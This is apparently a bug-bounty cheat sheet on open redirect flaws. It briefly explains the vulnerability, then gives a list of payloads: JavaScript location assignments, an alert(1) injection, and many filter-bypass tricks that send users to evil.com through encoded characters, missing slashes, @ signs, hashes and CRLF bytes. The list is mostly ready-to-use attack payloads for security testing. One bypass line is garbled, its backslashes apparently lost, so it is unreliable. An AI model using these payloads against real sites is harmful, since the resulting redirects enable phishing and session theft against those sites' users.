9. Open Redirect

PayloadsAllTheThings/Open Redirect at master · swisskyrepo/PayloadsAllTheThingsGitHub

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md

An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing. Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.

https://example.com/redirect?url=https://userpreferredsite.com
https://example.com?redirect_to=https://                %22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

location="http://exodussec.com"

document.location = "http://google.com"

document.location.href="http://google.com"

window.location.assign("http://google.com")

window['location']['href']="http://google.com"

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

Open redirect bypasses

Simply try to change the domain:

?redirect=https://example.com --> ?redirect=https://evil.com

Bypass the filter when protocol is blacklisted using //

?redirect=https://example.com --> ?redirect=//evil.com

Bypass the filter when double slash is blacklisted using \\

?redirect=https://example.com --> ?redirect=levil.com

Bypass the filter when double slash is blacklisted using http: or https:

?redirect=https://example.com --> ?redirect=https:example.com

Bypass the filter using %40

?redirect=example.com --> ?redirect=example.com%40evil.com

Bypass the filter if it only checks for domain name

?redirect=example.com --> ?redirect=example.comevil.com

Bypass the filter if it only checks for domain name using a dot %2e

?redirect=example.com --> ?redirect=example.com%2eevil.com

Bypass the filter if it only checks for domain name using a query/question mark ?

?redirect=example.com --> ?redirect=evil.com?example.com

Bypass the filter if it only checks for domain name using a hash %23

?redirect=example.com --> ?redirect=evil.com%23example.com

Bypass the filter using a symbol

?redirect=example.com --> ?redirect=example.com/°evil.com

Bypass the filter using a url encoded Chinese dot %E3%80%82

?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com

Bypass the filter if it only allows you to control the path using a nullbyte %0d or %0a

?redirect=/ --> ?redirect=/%0d/evil.com